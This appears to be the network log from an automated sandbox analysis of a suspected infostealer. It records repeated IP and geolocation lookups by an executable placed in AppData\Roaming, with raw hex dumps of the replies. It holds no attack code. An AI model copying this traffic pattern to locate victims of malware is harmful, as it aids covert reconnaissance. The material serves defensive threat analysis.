                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                                            Sep 27, 2024 16:00:51.507982969 CEST127OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Sep 27, 2024 16:00:54.970485926 CEST320INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 27 Sep 2024 14:00:54 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: 1d8d503ec942569656e2cb2aab4e50d4
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                                            Sep 27, 2024 16:00:55.179586887 CEST320INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 27 Sep 2024 14:00:54 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: 1d8d503ec942569656e2cb2aab4e50d4
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            5192.168.2.2249170193.122.130.0803952C:\Users\user\AppData\Roaming\millitingacy20306.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Sep 27, 2024 16:00:55.846873045 CEST127OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Sep 27, 2024 16:00:56.305012941 CEST320INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 27 Sep 2024 14:00:56 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: 587d3bd77e22b344674240f63a7f5a8b
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                                            Sep 27, 2024 16:00:56.515530109 CEST320INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 27 Sep 2024 14:00:56 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: 587d3bd77e22b344674240f63a7f5a8b
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            6192.168.2.2249172193.122.6.168803952C:\Users\user\AppData\Roaming\millitingacy20306.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Sep 27, 2024 16:00:57.544178963 CEST151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Sep 27, 2024 16:00:58.171607971 CEST320INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 27 Sep 2024 14:00:58 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: 8e957b35fc05b92d098baa173ea231f7
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            7192.168.2.2249174193.122.130.0803952C:\Users\user\AppData\Roaming\millitingacy20306.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Sep 27, 2024 16:00:58.904943943 CEST151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Sep 27, 2024 16:00:59.359123945 CEST320INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 27 Sep 2024 14:00:59 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: 7402539fe61b643e2374ac40d6eb434c
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                                            Sep 27, 2024 16:00:59.575676918 CEST320INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 27 Sep 2024 14:00:59 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: 7402539fe61b643e2374ac40d6eb434c
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            8192.168.2.2249176132.226.247.73803952C:\Users\user\AppData\Roaming\millitingacy20306.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Sep 27, 2024 16:01:00.375473022 CEST151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Sep 27, 2024 16:01:01.041918039 CEST320INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 27 Sep 2024 14:01:00 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: a9f84998812463eba6a468914e764c43
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                                            Sep 27, 2024 16:01:01.256927013 CEST320INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 27 Sep 2024 14:01:00 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: a9f84998812463eba6a468914e764c43
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            9192.168.2.2249178193.122.130.0803952C:\Users\user\AppData\Roaming\millitingacy20306.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Sep 27, 2024 16:01:01.801892996 CEST151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Sep 27, 2024 16:01:03.284373045 CEST320INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 27 Sep 2024 14:01:03 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: 3099f87b6bea9ce5ab4ba1506d2d6991
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            10192.168.2.2249180158.101.44.242803952C:\Users\user\AppData\Roaming\millitingacy20306.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Sep 27, 2024 16:01:04.175568104 CEST151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Sep 27, 2024 16:01:05.343657017 CEST320INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 27 Sep 2024 14:01:05 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: 78b51b7488aec6b8898f57ef301d4c72
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                                            Sep 27, 2024 16:01:05.551609039 CEST320INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 27 Sep 2024 14:01:05 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: 78b51b7488aec6b8898f57ef301d4c72
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            11192.168.2.2249182158.101.44.242803952C:\Users\user\AppData\Roaming\millitingacy20306.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Sep 27, 2024 16:01:06.002305984 CEST151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Sep 27, 2024 16:01:07.594924927 CEST320INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 27 Sep 2024 14:01:07 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: f240348780227e505b29ec96a4f5f691
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                                            Sep 27, 2024 16:01:07.807583094 CEST320INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 27 Sep 2024 14:01:07 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: f240348780227e505b29ec96a4f5f691
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                                            HTTPS Proxied Packets

                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.2249168188.114.96.34433952C:\Users\user\AppData\Roaming\millitingacy20306.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-09-27 14:00:50 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-09-27 14:00:50 UTC674INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 27 Sep 2024 14:00:50 GMT
                                                                                                            Content-Type: application/xml
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            access-control-allow-origin: *
                                                                                                            vary: Accept-Encoding
                                                                                                            Cache-Control: max-age=86400
                                                                                                            CF-Cache-Status: HIT
                                                                                                            Age: 20206
                                                                                                            Last-Modified: Fri, 27 Sep 2024 08:24:04 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eN9NmceLB79BgwP8WflfydQka4vwCXhHi9FsGuA1tOKgpyeFUe2q%2BRkfYY2uZfKOa244wHeRv%2BEkYfmuCtY4jTkd5AyeK9UUilzvfBII40gabvn4i8HUSgTYJDCOJZqSO2lwFPG2"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8c9c05b39d600f8f-EWR
                                                                                                            2024-09-27 14:00:50 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                                            2024-09-27 14:00:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.2.2249169188.114.96.34433952C:\Users\user\AppData\Roaming\millitingacy20306.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-09-27 14:00:55 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            2024-09-27 14:00:55 UTC676INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 27 Sep 2024 14:00:55 GMT
                                                                                                            Content-Type: application/xml
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            access-control-allow-origin: *
                                                                                                            vary: Accept-Encoding
                                                                                                            Cache-Control: max-age=86400
                                                                                                            CF-Cache-Status: HIT
                                                                                                            Age: 20211
                                                                                                            Last-Modified: Fri, 27 Sep 2024 08:24:04 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8M5cXVdo3adbDpvAgeXsFx9zJA8%2FBOzk3wDf6zyn7sUYU4jKQ7fm5WRmi8ZeDClIfz4EFeB%2Bg3BnjKoXwGDqWBJ0ZeZVbDDw98pxRH%2FygBVCjLeR9ZWT3ZsSpjSIWHwKkqTW59ya"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8c9c05d30e448ce0-EWR
                                                                                                            2024-09-27 14:00:55 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                                            2024-09-27 14:00:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            2192.168.2.2249171188.114.96.34433952C:\Users\user\AppData\Roaming\millitingacy20306.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-09-27 14:00:57 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            2024-09-27 14:00:57 UTC674INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 27 Sep 2024 14:00:57 GMT
                                                                                                            Content-Type: application/xml
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            access-control-allow-origin: *
                                                                                                            vary: Accept-Encoding
                                                                                                            Cache-Control: max-age=86400
                                                                                                            CF-Cache-Status: HIT
                                                                                                            Age: 20213
                                                                                                            Last-Modified: Fri, 27 Sep 2024 08:24:04 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g%2Fg4J5AVdpp4f8VTbD5AOrEAoCo1hXJt7N0eeOsukvLMPZ43UsRoyKu4bam6ZjnDv7neIx7eCW84gfSL%2BSLbhWvzkm35SnmkSxHR7r0c49Kn3BOlTSE95ecq7MbDiIdbGkZ0fHMf"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8c9c05deaea07c9a-EWR
                                                                                                            2024-09-27 14:00:57 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                                            2024-09-27 14:00:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            3192.168.2.2249173188.114.97.34433952C:\Users\user\AppData\Roaming\millitingacy20306.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-09-27 14:00:58 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-09-27 14:00:58 UTC670INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 27 Sep 2024 14:00:58 GMT
                                                                                                            Content-Type: application/xml
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            access-control-allow-origin: *
                                                                                                            vary: Accept-Encoding
                                                                                                            Cache-Control: max-age=86400
                                                                                                            CF-Cache-Status: HIT
                                                                                                            Age: 20214
                                                                                                            Last-Modified: Fri, 27 Sep 2024 08:24:04 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lzCxMFP5DniyrSNAyHuHKSfO3jwB63Xam38qcLK7UtflRSxwOo5KSpfwwnaLEf4sSRl4L1YP0sdrFf1W20TZYveXM0CysAfBqokdmE6xr3tihNCA1A9v2XlYQ2f9UszMg33spVAl"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8c9c05e72d1943cf-EWR
